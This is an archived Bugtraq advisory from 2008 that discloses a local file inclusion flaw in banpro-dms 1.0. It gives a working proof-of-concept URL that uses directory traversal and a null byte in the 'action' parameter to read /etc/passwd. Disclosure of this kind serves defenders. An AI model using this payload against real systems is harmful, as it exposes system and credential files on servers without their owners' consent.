Bugtraq mailing list archives

banpro-dms 1.0 local file inclusion vulnerability


From: "muuratsalo experimental hack lab" <muuratsalo () gmail com>
Date: Sat, 16 Feb 2008 15:05:02 +0100

banpro-dms 1.0 local file inclusion vulnerability

download   http://sourceforge.net/projects/banprodms

author     muuratsalo
contact    muuratsalo[at]gmail.com

exploit
http://localhost/DMS/index.php?action=../../../../../../../../../../etc/passwd%00


Current thread: